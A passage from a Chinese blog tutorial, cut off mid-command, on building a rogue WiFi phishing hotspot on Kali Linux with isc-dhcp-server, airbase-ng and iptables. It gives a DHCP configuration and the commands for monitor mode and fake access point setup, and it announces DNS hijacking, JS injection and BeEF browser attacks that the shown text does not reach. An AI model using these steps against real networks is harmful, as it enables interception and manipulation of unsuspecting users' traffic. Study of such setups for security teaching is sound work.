利用Kali进行WiFi钓鱼测试实战

本文详细介绍了如何在Kali Linux上建立WiFi钓鱼热点,包括DNS劫持、JS注入、图片嗅探和利用BEEF进行浏览器攻击测试。通过isc-dhcp-server、Aircrack-ng、iptables等工具,实现热点建立、NAT配置、DNS劫持及Web流量劫持,并提供了相关脚本。请注意,这些技术仅供安全学习和教学,禁止非法使用。
摘要由CSDN通过智能技术生成

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用。请不要做一只咖啡馆里安静的猥琐大叔。

写在前面

从至少一年前我就一直想在自己跑kali的笔记本上架个钓鱼热点。然而由于网上的教程的nat写得有问题,别人写好的脚本和我电脑有些互不待见,最接近成功的一次只做到了qq能聊天,百度都上不去。

而最近忽然意识到了问题的所在,成功实现了建立wifi热点,dns劫持,js注入,图片嗅探,和BEEF结合对用户浏览器进行攻击测试。

故写此文分享给大家,希望与之前的我有一样困惑的同志们能有所收获。

建立热点

工具:isc-dhcp-server  ;Aircrack-ng套件;iptables

建立过程:

首先写dhcp配置文件/etc/dhcp/dhcpd.conf 

写入如下内容:

authoritative;

 

default-lease-time 700;

max-lease-time 8000;

 

subnet 10.0.0.0 netmask 255.255.255.0 {

option routers 10.0.0.1;

option subnet-mask 255.255.255.0;

 

option domain-name-servers 10.0.0.1;

 

range 10.0.0.10 10.0.0.100;

 

}

这里以10.0.0.1作为网关和dns服务器地址。

然后我们处理无线网卡

ifconfig wlan1 down           #wlan1修改成你的网卡

iwconfig wlan1 mode monitor

ifconfig wlan1 up

airmon-ng start wlan1

上述命令可以防止出现:Error: Got channel -1, expected a value > 0.

然后用airbase建立热点

airbase-ng -Fishing -11 mon0

热点的网络流量会被虚拟到at0这块网卡上面

ifconfig at0 up

ifconfig at0 10.0.0.1 netmask 255.255.255.0

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

打开ip转发

echo 1 > /proc/sys/

  • 5
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值